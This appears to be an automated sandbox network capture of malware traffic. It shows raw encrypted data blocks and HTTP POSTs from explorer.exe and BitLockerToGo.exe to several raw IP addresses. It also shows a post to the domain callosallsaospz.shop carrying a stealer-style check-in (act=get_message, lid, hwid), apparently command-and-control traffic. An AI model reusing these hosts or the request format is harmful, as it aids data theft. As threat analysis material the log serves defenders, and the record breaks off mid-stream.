2024-07-24 17:57:02 UTC	4096	IN	Data Raw: e1 d7 09 8a 1f 1b d0 f3 8c 65 10 0b ba 00 12 5e 66 40 a3 ff 37 fb 4f 9a 1d 87 2f 82 36 f4 97 a3 a2 53 35 44 6f 49 46 a1 46 00 8c 61 7f 68 00 8d ef 47 ca e0 aa b1 d3 ce 3b 74 24 f4 37 8a eb 6f 8a 85 e2 50 1a 36 92 c1 61 33 9a cd 39 40 81 b9 a4 1f 2d 96 33 eb c0 a7 40 91 64 06 6b 0a 7c 15 c6 37 61 b3 a5 8f 0f d0 76 ea 2c b1 70 be 08 49 92 2f 88 eb 19 ba ee e7 6f be 55 70 4e 25 d9 b6 4a d5 1e e6 00 c1 6e e1 51 51 e6 8b 6b 90 92 92 28 57 17 e5 ae bf 5d 13 52 62 33 a2 6f 4a f6 63 f0 7b e6 0f f1 6b 80 62 58 0a 0f 75 b5 73 fd 1b d2 35 64 5c 28 07 40 16 e4 f1 d7 01 04 42 be b3 07 73 de 63 fe a0 d3 31 7f ec 6b 25 52 e9 b3 2e 6b 82 3d a6 71 71 ad 75 b0 c3 e3 56 db 95 02 b0 6a 4b 8c 23 9d 32 29 9f 9a 2f 22 e9 ce 6c 41 ce 20 22 ae 05 71 70 69 ed 12 8d 24 90 44 c7 97 Data Ascii: e^f@7O/6S5DoIFFahG;t$7oP6a39@-3@dk\|7av,pI/oUpN%JnQQk(W]Rb3oJc{kbXus5d\(@Bsc1k%R.k=qquVjK#2)/"lA "qpi$D
2024-07-24 17:57:02 UTC	4096	IN	Data Raw: 48 fd 37 b9 28 c3 5e 1e 02 ee 02 e9 bb bc 2a 1f 47 11 3e 30 35 15 0e 91 97 83 63 a4 5e 11 28 8c 43 df ca f4 39 71 7e a7 b7 17 8a 88 8a 2c d6 0e a3 6d 8b a7 ca 40 71 19 c7 ee 18 2d 61 d5 3f ea 52 90 cd a3 fb fa ad e3 54 0b cb 44 61 90 88 c6 26 dd c6 72 aa 71 7f 0e 87 91 5f 8a c0 b2 da 7c c3 9e 58 36 2f cf 02 fb 2f 5f e8 60 27 a9 e3 6e db 0d 8b 86 d3 9c de 6b 31 80 d0 11 88 df e6 1e c4 df 48 88 95 bb 84 61 04 01 87 0e bd 7c 0a 96 2f d6 f3 b7 ee b1 1d 8e 02 3a 2a 17 d9 64 4c aa a0 5e 61 83 81 40 cf ac 9b 0a 45 89 98 67 bf af a6 d6 a8 0c f3 55 de a0 ce 55 90 e1 7a 18 69 eb 70 93 6a 69 16 39 3e 2d b9 ce f2 80 ed c7 6b ad 99 39 86 ce dc 48 72 0f 2d 36 23 1b 59 73 0f 89 22 86 ce f1 ee 1f 71 95 e6 2a 5a bc a1 22 70 a3 7c 0c 5c 1c 14 b2 09 d0 8f 2b 0b 14 19 47 de Data Ascii: H7(^G>05c^(C9q~,m@q-a?RTDa&rq_\|X6//_`'nk1Ha\|/:dL^a@EgUUzipji9>-k9Hr-6#Ys"q*Z"p\|\+G
2024-07-24 17:57:02 UTC	4096	IN	Data Raw: 9f c6 61 c7 00 01 56 58 ea b9 7e 02 01 c1 66 77 6b 3e d9 ee 41 91 c6 1f 4f 04 57 ff 2d 4c cd 0b 82 c3 03 e3 6f f1 cc 47 4d f8 95 e8 db 55 a7 c9 58 ab 76 6a d1 8a ae 5d 93 6a 5d 19 20 57 27 d4 79 f0 5c 4f 9a 7e d9 35 46 7e 3b 7d db 9a 36 ae 77 55 e2 7d b6 9b 16 83 5c 91 40 b2 e7 4b 1d 05 be 9c 78 84 c5 6e c1 09 34 c8 9b 9b 43 8f b2 47 51 4a eb 76 f5 4f 7a 02 09 d5 08 a3 41 85 33 b5 82 a9 fd ce ea 1a 43 ee 58 84 78 d3 c4 70 57 55 91 45 a9 0b 30 2b ef 9e b8 d3 10 ba 9d fd 7a 09 54 68 36 30 e9 6a 65 22 c4 bd 08 fe 01 87 ee 51 a9 f4 a3 2c cd 1b d4 b3 5a 7d 17 6d 28 ba 03 58 5c d8 1b 8b 33 51 75 ca f7 25 af 88 66 79 01 6c 03 a9 1a 72 c8 2e 4f a5 25 f7 1a 0c f8 57 3c 48 6a 19 21 54 23 e5 c1 64 00 94 1d eb ee dc e0 05 54 71 fb 73 b7 f4 19 27 8f 25 7a 3e 81 14 34 Data Ascii: aVX~fwk>AOW-LoGMUXvj]j] W'y\O~5F~;}6wU}\@Kxn4CGQJvOzA3CXxpWUE0+zTh60je"Q,Z}m(X\3Qu%fylr.O%W<Hj!T#dTqs'%z>4
2024-07-24 17:57:02 UTC	4096	IN	Data Raw: dd fc 5d 03 e2 da ea ed f3 ea 57 d7 0c b6 63 eb c8 96 1e 06 92 83 77 43 3e 49 04 09 62 7d f7 4b a3 96 c9 67 6f 00 6d 03 09 19 16 57 20 83 a3 f5 b2 d0 ae 12 f9 60 fb cc a0 0d 97 e1 81 d5 63 9b 40 17 c7 6c 85 7e 76 fe 3b 55 6a 31 bf a4 a1 16 7a 3c 8b af fd 2a 3b 4a 5f 02 79 75 df 07 2f ec e3 89 3d 34 0a ae 62 d1 9e ac b5 0f 90 2f a5 a9 7e 9d bf a5 ed 11 23 a7 25 c1 ec a2 cb 45 2b c8 9a 0e 17 6d bd 5d b3 28 e5 c6 a9 c7 d1 a8 3f 07 94 8b b8 27 31 d2 4a d0 19 c4 6f 60 76 ea 8f e6 20 08 ae a2 10 53 14 d3 d4 32 b4 94 a7 d6 b7 4d 89 42 b3 33 e3 48 f2 eb bf 8e bc 99 e6 cc b5 c1 36 7e 00 32 ba e8 79 9f 05 ca 10 bd d7 6e 81 cc c8 d4 e4 f1 d0 09 c3 69 20 9a 51 01 f7 19 ec 74 89 e8 18 a0 44 10 51 cd e7 61 84 6f 50 9f a7 12 ea a3 e8 93 05 84 a1 ad 57 36 9f 34 50 a0 5f Data Ascii: ]WcwC>Ib}KgomW `c@l~v;Uj1z<*;J_yu/=4b/~#%E+m](?'1Jo`v S2MB3H6~2yni QtDQaoPW64P_
2024-07-24 17:57:02 UTC	4096	IN	Data Raw: e4 09 5e 08 b9 49 16 aa 7e bf d1 b7 a4 93 08 85 34 5d 4f b9 dd ad 42 f9 49 8f 55 bc cb 86 e7 28 6e 12 07 5d 86 47 db fc 99 78 61 90 0e c2 40 78 62 4c ed bf 6d d7 c8 3f 50 f8 25 58 df 00 4f aa 0c 2c 09 1e ea df d2 21 b3 49 ec 21 e7 c1 f3 71 1f c1 7d 8a c6 bc 43 86 fd c9 be 99 2c cf 45 9b b3 b9 4c 95 9f 05 6f dd c0 e9 02 a9 31 0a 77 98 52 8b 76 e4 1c 0a bd bf db cb c8 10 1f 0f 35 c7 73 2f 2d dc 87 65 17 e8 05 d2 b1 56 91 df 3a 3c 1e 07 ad b3 f1 fa e3 5a 20 c9 9a 3d 77 0e 67 1c 07 48 11 b8 04 af 5a db 43 ad bb ba 10 29 89 26 05 82 6c e4 dd 29 f1 f9 7b 61 0a 54 97 6d 54 88 32 55 d3 9f 1e d2 88 ba 5a 63 bc 94 d7 d8 fc 1d 93 6f 0c c6 ba 6d 5d 4d 59 61 26 e7 25 57 aa 02 36 36 e2 23 ec a8 1e c5 ca 6c 7b 96 0d 99 01 31 b9 44 37 e1 42 7c 0d b7 e0 37 29 61 b4 6e ec Data Ascii: ^I~4]OBIU(n]Gxa@xbLm?P%XO,!I!q}C,ELo1wRv5s/-eV:<Z =wgHZC)&l){aTmT2UZcom]MYa&%W66#l{1D7B\|7)an
2024-07-24 17:57:02 UTC	4096	IN	Data Raw: ca df f1 f8 f5 29 b3 67 0e 68 e3 11 02 e6 69 cd 6f 02 29 3a 1d 13 8b 42 6a ae 29 56 0d 16 51 aa 71 22 94 8c 40 98 e7 12 4e 4c c1 8d a4 1a ed d7 6b 74 01 ef 86 9c dd 5a 33 8e ea af 81 41 b7 9e cf c5 05 0f b7 e2 3e 45 48 b4 92 14 64 1b 37 f2 e0 b8 55 fb 1f f7 22 ad 10 11 e6 0f 86 53 1c 2a 30 42 90 d5 80 1d 8d 55 df 87 c0 c0 72 c4 76 c2 51 62 68 88 9f d2 c3 39 48 fd 7b 7f 34 c0 c2 c5 aa 8c d2 cc 42 6e b8 bf d4 7f 02 4e 21 a2 0f c8 7e ba 56 f5 49 4a f9 2e 20 d4 74 87 35 2c dd e7 03 29 bf 1d 9f 32 0d 2a e8 94 31 f4 8b a6 3c b0 3a 59 c2 0c f2 45 cd 02 0d de 7c d0 1b d4 2d 76 6d c0 d7 81 eb a0 80 18 ed f7 1b 10 80 84 33 c7 8a 5f 1c 2d 9f f8 63 47 1b 28 17 ba af b0 6c b7 aa 00 3a 17 27 16 f8 17 b2 3e 55 c2 ff 8d 76 40 d1 6e ab 85 6e b0 05 99 89 0e 7e 34 89 74 1c Data Ascii: )ghio):Bj)VQq"@NLktZ3A>EHd7U"S0BUrvQbh9H{4BnN!~VIJ. t5,)21<:YE\|-vm3_-cG(l:'>Uv@nn~4t
2024-07-24 17:57:02 UTC	4096	IN	Data Raw: 10 88 8a dc 89 ef 20 08 db d5 0a 8e df 18 35 80 b9 fb 0a 52 46 8a d4 73 22 6b 43 08 0e 33 29 73 52 01 1e 0b d5 4d 36 01 af 74 c2 28 99 a5 0b 15 9a 7c c0 6a fa 0a 60 b9 a2 52 80 37 72 fb 4d 1b 3a 3a d2 f2 e2 7c cc ef cf 52 b1 a7 14 0f ea 07 e4 81 cb 45 5d 3d 47 ac 01 51 5c 52 77 d4 0a 4c 59 53 5b f9 a8 e4 cf b9 0d dd a3 58 af ce 69 97 59 94 b7 15 c7 68 df 15 a5 8a e5 ff e0 61 40 74 ee 65 0e 70 53 10 cc 4c 3c f1 86 73 33 8d 9b 72 2c 32 66 86 c3 b3 f7 98 35 e5 9a a9 b0 e0 c8 28 2d 7c 4e 59 e0 c9 a2 1b 8f 23 d0 04 1c 46 f3 c4 8a 3f bf 3b 10 7c 58 25 a7 6f 1d a6 7d 90 e0 67 96 ea ae 9d b5 2c 1b ab a7 62 fc c9 10 9c 5b 85 83 61 35 01 5c 99 ef 12 e4 19 59 34 05 b0 5c 54 a7 e6 2f df 13 0c a6 e4 f5 ab 9a 4e 73 e2 a2 3e 34 43 6b ed 44 74 ec 94 88 32 d9 a6 1d 65 53 Data Ascii: 5RFs"kC3)sRM6t(\|j`R7rM::\|RE]=GQ\RwLYS[XiYha@tepSL<s3r,2f5(-\|NY#F?;\|X%o}g,b[a5\Y4\T/Ns>4CkDt2eS
2024-07-24 17:57:02 UTC	1067	IN	Data Raw: d3 b4 a5 8e f5 69 fc 50 76 a7 e1 c7 40 74 33 d8 8d e3 79 4f 1e d2 37 57 1f 6a c1 37 67 20 a0 06 8d f8 3e 8a 0b 84 2d 15 3c 89 16 45 46 58 00 de d5 00 06 99 f6 79 a7 f9 a9 b3 a8 df bf 94 e3 95 76 58 3f ff 7b d0 ff ba 83 dc 60 f5 2d b7 31 fe 1e 5c a7 9d 64 2b a7 47 78 c7 bc ac 47 ef ed eb ff fc a7 68 94 c2 56 67 2f 75 a0 7f 54 6f 07 7a 48 2c 7a df ea b1 c4 2b 42 d6 9f 8d 53 23 db 8e 14 34 44 0e c7 fc 96 0e fa 2d 62 e0 57 d6 83 c8 32 d3 31 7b f3 bb 3b 24 01 e8 f0 f1 c6 d1 2a d7 1e c7 e8 bf 40 a7 a2 fa 6e da 59 f0 9c 1b 87 ab a0 79 16 b4 f0 da ab 78 57 f4 48 69 14 d5 b9 c7 1f c4 ad 96 1a 9b 86 4f bb 52 5a 65 9a 33 01 15 25 1d 66 e3 be 8a c5 1d f6 76 7a 4b 8d 0f 64 95 e7 b6 fc 80 c8 df 87 41 8b 0d 14 1a 5f ae 23 73 7a 86 b8 5f 27 05 b2 5a 0d 94 fb 31 e3 3d b3 Data Ascii: iPv@t3yO7Wj7g >-<EFXyvX?{`-1\d+GxGhVg/uTozH,z+BS#4D-bW21{;$*@nYyxWHiORZe3%fvzKdA_#sz_'Z1=
2024-07-24 17:57:02 UTC	4096	IN	Data Raw: 46 94 44 d4 1a bd 3d 25 28 41 89 70 53 b6 3c 25 25 87 79 91 ae c9 a4 55 0a 23 67 fa 87 63 75 7b 9d 41 56 7d 7f 0e 4e 89 bb be d7 da 36 be 6b c3 a1 06 8d f0 93 52 17 4d 10 c9 99 ea 02 e6 50 f9 e5 21 9e 7a ef 7b 14 85 df e2 43 42 e9 89 3e ce 49 11 a4 e9 1a 9b e0 63 7f cf 38 7b c0 30 0b 4d fc c8 36 a5 a1 f7 ef 19 2e 9b c0 9b d0 2a e1 a0 99 2a 24 92 2a 4b b8 b9 af b7 fe 77 cf e1 c2 cc 81 d8 2c 3a b0 ae 03 5d 77 b6 cb 0c f1 65 48 4b ba 80 14 71 91 ae d1 00 d0 b1 96 cb 3a a3 5f 8f 40 b8 5c 01 01 50 23 32 f9 af 96 a9 bb de 1a 18 32 4e 69 af 4a ea 2f 61 0f 18 82 76 e8 02 27 0f a1 33 99 cf e2 7a c7 72 82 55 fc 2d 8a 31 61 85 7c 4f 50 24 40 e5 8f 80 8f b9 e4 4c 85 3e 7f fc 3c df 03 e3 72 0e c4 81 8e b1 72 e3 f8 be 34 52 88 59 35 e9 d8 eb a0 0d 01 54 78 c8 02 bd 1c Data Ascii: FD=%(ApS<%%yU#gcu{AV}N6kRMP!z{CB>Ic8{0M6.*$Kw,:]weHKq:_@\P#22NiJ/av'3zrU-1a\|OP$@L><rr4RY5Tx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49771	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:02 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:02 UTC	1267	OUT	Data Raw: 71 38 70 77 64 6d 67 51 6a 74 63 53 58 52 4f 73 2b 6e 46 47 6c 37 44 4b 4b 58 50 39 44 38 44 57 52 38 47 45 78 34 57 68 62 71 4f 35 63 6b 70 36 33 67 78 51 53 42 6b 69 4b 30 59 39 7a 66 53 4e 69 6a 45 47 69 6a 72 4c 45 65 2b 52 38 67 38 43 47 55 74 47 76 38 6a 36 63 56 49 77 79 32 39 2f 6b 75 31 68 78 6c 50 49 65 67 47 79 46 5a 61 33 75 6e 38 58 68 7a 52 51 53 79 31 72 47 38 45 65 61 5a 58 4c 63 5a 58 2f 37 45 45 6c 51 6d 53 65 42 53 2f 79 4c 77 62 78 6e 6a 43 78 69 76 6c 67 53 41 49 51 74 5a 73 74 55 6b 53 66 69 39 39 69 70 5a 64 34 67 6a 7a 4d 63 55 54 53 42 2f 79 52 77 71 78 4b 44 35 2b 45 79 73 42 41 37 65 43 6a 35 37 2b 53 77 31 36 47 2f 5a 69 38 51 31 74 6b 7a 61 35 64 50 4a 4e 55 56 61 6e 62 50 78 4f 49 47 68 68 49 48 6e 69 59 54 50 68 34 52 56 50 Data Ascii: q8pwdmgQjtcSXROs+nFGl7DKKXP9D8DWR8GEx4WhbqO5ckp63gxQSBkiK0Y9zfSNijEGijrLEe+R8g8CGUtGv8j6cVIwy29/ku1hxlPIegGyFZa3un8XhzRQSy1rG8EeaZXLcZX/7EElQmSeBS/yLwbxnjCxivlgSAIQtZstUkSfi99ipZd4gjzMcUTSB/yRwqxKD5+EysBA7eCj57+Sw16G/Zi8Q1tkza5dPJNUVanbPxOIGhhIHniYTPh4RVP
2024-07-24 17:57:04 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:03 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:04 UTC	685	IN	Data Raw: 49 32 6d 30 61 74 51 6f 38 31 5a 4f 62 7a 48 69 72 74 76 46 72 64 51 39 65 41 44 47 57 71 4b 4c 50 78 63 41 77 79 4c 46 32 4a 48 48 6e 41 75 5a 57 72 45 76 77 70 41 35 70 36 63 41 75 38 50 6e 33 33 78 54 41 52 66 6e 45 44 50 32 50 65 67 4a 6f 45 56 43 55 46 56 65 38 59 5a 56 56 4d 78 69 47 6f 70 41 54 77 78 64 6d 70 4a 37 48 59 42 52 37 51 58 2f 42 4f 66 75 58 69 78 56 39 6e 77 54 53 71 6e 71 53 52 4c 57 72 56 77 65 74 7a 54 55 36 2b 79 41 67 4e 4e 75 68 33 4a 73 57 32 6c 42 49 4f 4e 4c 38 51 79 4e 6c 61 33 55 50 36 51 55 79 62 2b 38 48 34 42 30 75 33 54 4a 74 6d 61 30 44 44 70 51 44 77 32 4f 75 70 48 67 2f 69 48 2f 75 36 52 77 50 75 31 47 32 46 6d 63 44 59 48 5a 6a 33 2f 75 6b 4d 57 4f 4c 34 6f 59 43 78 4f 6b 48 34 62 4c 66 51 65 34 4c 64 49 70 70 34 59 Data Ascii: I2m0atQo81ZObzHirtvFrdQ9eADGWqKLPxcAwyLF2JHHnAuZWrEvwpA5p6cAu8Pn33xTARfnEDP2PegJoEVCUFVe8YZVVMxiGopATwxdmpJ7HYBR7QX/BOfuXixV9nwTSqnqSRLWrVwetzTU6+yAgNNuh3JsW2lBIONL8QyNla3UP6QUyb+8H4B0u3TJtma0DDpQDw2OupHg/iH/u6RwPu1G2FmcDYHZj3/ukMWOL4oYCxOkH4bLfQe4LdIpp4Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49772	188.114.96.3	443	4216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:04 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: callosallsaospz.shop
2024-07-24 17:57:04 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d 26 68 77 69 64 3d 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 Data Ascii: act=get_message&ver=4.0&lid=bOKHNM--&j=&hwid=8F2C114769E59A360D3FAAA1B508DF78
2024-07-24 17:57:05 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h2d9bq1hjnpckfmsvfp05r6pc5; expires=Sun, 17-Nov-2024 11:43:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5h0PsYkigl72qKl12bgzIRUeu%2BmFbebqVGOT9AkTNLotr5nMgN2mKe0ju8ZHGxrCvKFffdxdocdyXR4A99guxwYKm8LfCn1lvy7RUUXIKVd5I%2FvoF1cNKwqraPz5X8jbSRpFBhlRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85ca5e4e61c457-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:05 UTC	54	IN	Data Raw: 33 30 0d 0a 69 59 45 59 79 43 6b 37 2f 6a 6d 49 36 7a 6a 32 58 45 4d 38 6c 4e 46 59 6f 4f 68 4f 77 49 38 6d 70 64 57 7a 36 6b 70 45 39 56 44 53 33 41 3d 3d 0d 0a Data Ascii: 30iYEYyCk7/jmI6zj2XEM8lNFYoOhOwI8mpdWz6kpE9VDS3A==
2024-07-24 17:57:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49773	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:04 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:04 UTC	1122	OUT	Data Raw: 6e 32 52 52 67 38 51 37 54 71 34 43 64 77 49 6f 54 6c 33 79 51 30 4f 47 73 52 34 4a 4b 37 4a 44 48 56 5a 50 53 36 71 4f 6f 31 49 58 33 57 6e 70 53 59 4b 52 50 4e 6c 4a 78 61 6b 6b 4b 72 7a 4c 47 4f 47 31 49 43 2b 47 35 48 4c 39 30 6d 32 2b 71 74 4b 63 38 46 47 49 37 55 34 55 71 4a 56 6b 6b 68 5a 66 73 58 55 74 2f 50 4e 64 42 42 37 75 39 49 37 2f 65 30 2b 67 4e 6d 37 41 42 76 72 47 6a 5a 46 59 78 36 38 4d 6e 31 54 4f 4c 72 47 39 6c 42 38 6b 47 6a 47 55 48 39 5a 37 44 65 38 31 31 2b 30 4a 44 38 69 2f 76 42 50 77 63 6d 7a 78 56 61 43 4f 79 39 6c 70 53 39 42 44 57 52 4a 30 38 51 74 75 2b 53 34 5a 2b 4a 4c 70 6b 2f 59 71 48 70 53 6c 4b 77 68 46 34 45 38 78 31 68 4a 48 69 51 71 35 69 70 77 48 45 35 46 30 6c 72 71 33 34 70 37 55 53 32 4d 58 41 71 4e 66 46 69 4b Data Ascii: n2RRg8Q7Tq4CdwIoTl3yQ0OGsR4JK7JDHVZPS6qOo1IX3WnpSYKRPNlJxakkKrzLGOG1IC+G5HL90m2+qtKc8FGI7U4UqJVkkhZfsXUt/PNdBB7u9I7/e0+gNm7ABvrGjZFYx68Mn1TOLrG9lB8kGjGUH9Z7De811+0JD8i/vBPwcmzxVaCOy9lpS9BDWRJ08Qtu+S4Z+JLpk/YqHpSlKwhF4E8x1hJHiQq5ipwHE5F0lrq34p7US2MXAqNfFiK
2024-07-24 17:57:06 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:06 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:06 UTC	685	IN	Data Raw: 6c 58 35 39 65 49 4f 6f 75 7a 30 51 70 6a 46 32 4f 30 51 53 47 45 6f 7a 30 53 48 77 67 4e 55 7a 63 6a 33 31 4e 57 33 4b 6a 54 4a 79 79 53 34 55 44 38 4a 49 76 4b 54 73 5a 59 69 4c 6e 79 75 6c 77 65 67 38 66 62 46 53 41 43 30 49 79 4f 67 4d 4f 63 6d 49 4c 43 35 79 49 78 75 72 53 6f 53 64 56 4d 2f 58 56 30 41 58 2f 77 4d 62 6f 53 4d 34 37 68 58 64 49 58 76 38 4a 50 57 69 6e 36 76 61 71 66 75 76 5a 31 62 4d 6d 6d 53 55 48 32 63 75 42 39 6d 49 30 48 46 6f 51 35 36 57 4c 45 61 6a 46 57 62 39 32 30 4f 45 46 44 52 36 5a 38 73 64 58 61 30 53 78 73 76 6c 67 4c 50 69 30 64 30 6d 59 79 52 35 49 45 43 6a 53 44 6f 71 30 33 69 31 66 46 31 36 4b 2b 71 61 48 4a 4d 49 41 58 42 6d 76 62 59 6f 35 33 59 4d 35 53 30 46 64 46 34 55 4a 6d 52 41 38 68 2f 65 4e 47 6d 78 72 78 65 Data Ascii: lX59eIOouz0QpjF2O0QSGEoz0SHwgNUzcj31NW3KjTJyyS4UD8JIvKTsZYiLnyulweg8fbFSAC0IyOgMOcmILC5yIxurSoSdVM/XV0AX/wMboSM47hXdIXv8JPWin6vaqfuvZ1bMmmSUH2cuB9mI0HFoQ56WLEajFWb920OEFDR6Z8sdXa0SxsvlgLPi0d0mYyR5IECjSDoq03i1fF16K+qaHJMIAXBmvbYo53YM5S0FdF4UJmRA8h/eNGmxrxe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49774	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:06 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:06 UTC	1267	OUT	Data Raw: 63 35 62 72 4f 70 6f 44 4f 69 4f 4e 72 66 31 39 6f 76 68 73 39 78 70 35 37 63 31 31 4e 33 33 6a 78 72 73 7a 6d 63 45 55 33 44 6e 41 39 7a 47 71 49 71 51 64 58 4c 32 74 34 4f 75 4e 53 51 67 41 71 76 47 52 4f 34 47 5a 69 62 44 2b 48 46 36 2b 2f 4e 7a 63 52 6c 43 66 6c 69 66 6c 69 69 76 64 2b 35 64 4c 58 51 78 71 34 72 74 6c 78 30 46 51 49 4a 61 50 6e 7a 4c 56 63 38 79 77 62 46 33 52 6b 49 50 2f 4a 6b 37 4b 66 53 66 62 30 2f 52 77 70 37 49 52 4e 63 61 58 4a 30 72 46 54 48 32 50 43 6b 72 61 62 2b 31 55 34 77 47 59 79 77 77 57 74 50 52 32 4a 68 6e 71 78 51 37 48 34 63 2f 33 50 56 70 38 62 34 43 38 4b 4b 68 58 51 39 50 42 36 5a 42 79 42 53 55 47 50 66 79 50 49 2b 67 62 37 75 4b 78 55 62 63 35 56 35 49 32 74 33 66 77 71 53 78 56 68 63 52 4c 47 4c 46 56 62 56 54 Data Ascii: c5brOpoDOiONrf19ovhs9xp57c11N33jxrszmcEU3DnA9zGqIqQdXL2t4OuNSQgAqvGRO4GZibD+HF6+/NzcRlCflifliivd+5dLXQxq4rtlx0FQIJaPnzLVc8ywbF3RkIP/Jk7KfSfb0/Rwp7IRNcaXJ0rFTH2PCkrab+1U4wGYywwWtPR2JhnqxQ7H4c/3PVp8b4C8KKhXQ9PB6ZByBSUGPfyPI+gb7uKxUbc5V5I2t3fwqSxVhcRLGLFVbVT
2024-07-24 17:57:07 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:07 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:07 UTC	685	IN	Data Raw: 5a 42 43 36 59 46 72 58 4f 35 72 57 53 61 76 39 31 68 6b 54 6b 35 45 51 67 69 63 4b 59 67 35 4b 49 33 38 74 71 79 75 4e 51 51 2f 31 36 67 42 57 65 52 2b 35 65 74 5a 54 6d 35 64 69 4e 37 35 7a 32 48 4c 39 37 6c 35 43 30 4b 44 4f 50 51 4a 6d 43 46 76 57 34 74 4a 79 63 66 57 57 30 63 77 35 5a 7a 38 6e 75 2b 43 41 36 48 39 4e 6a 42 4a 6d 2b 48 47 50 72 71 48 2f 68 6a 37 45 75 67 4a 34 6f 50 66 79 63 38 63 5a 37 68 46 53 55 79 67 72 76 53 6d 57 6a 50 79 75 50 4e 7a 4d 49 58 72 2b 52 62 61 49 33 73 70 56 78 7a 71 32 41 68 44 59 57 49 53 37 76 4b 47 75 51 71 34 6a 52 6c 4e 74 43 41 38 64 67 63 68 62 42 37 37 5a 76 4d 30 59 31 50 5a 42 75 52 34 49 76 6a 59 32 6d 5a 2b 47 61 4b 30 53 70 6c 50 49 49 4f 47 70 4f 76 30 42 33 4f 76 72 47 62 49 72 6b 36 30 32 55 32 76 Data Ascii: ZBC6YFrXO5rWSav91hkTk5EQgicKYg5KI38tqyuNQQ/16gBWeR+5etZTm5diN75z2HL97l5C0KDOPQJmCFvW4tJycfWW0cw5Zz8nu+CA6H9NjBJm+HGPrqH/hj7EugJ4oPfyc8cZ7hFSUygrvSmWjPyuPNzMIXr+RbaI3spVxzq2AhDYWIS7vKGuQq4jRlNtCA8dgchbB77ZvM0Y1PZBuR4IvjY2mZ+GaK0SplPIIOGpOv0B3OvrGbIrk602U2v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49775	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:08 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:08 UTC	1122	OUT	Data Raw: 6d 79 74 67 6c 34 68 52 79 49 38 6a 73 71 32 31 56 38 62 51 67 65 47 53 57 43 39 4d 4b 52 44 52 35 39 63 50 6f 37 63 4c 30 38 4c 6b 32 61 51 6f 50 65 4e 42 68 55 49 78 7a 2f 34 49 6e 42 46 75 7a 63 55 57 4f 44 77 37 78 43 61 6b 33 70 75 65 65 4a 47 4c 4c 53 54 76 38 6d 34 53 44 44 6b 59 61 6d 6f 2f 42 6d 57 47 4f 6e 77 4c 34 5a 58 67 70 35 48 76 42 4e 51 6e 2f 45 38 78 34 46 78 44 51 4e 39 69 2b 5a 57 65 47 76 46 62 50 49 76 2f 63 59 6f 38 78 62 72 33 5a 38 51 53 31 75 71 4e 64 55 44 59 48 6e 75 35 51 2b 4e 4d 7a 37 71 55 77 73 45 51 59 30 63 6f 77 58 76 44 77 58 4b 45 58 38 61 4d 47 6d 46 4d 6f 38 77 6f 31 61 43 51 2f 52 48 64 56 49 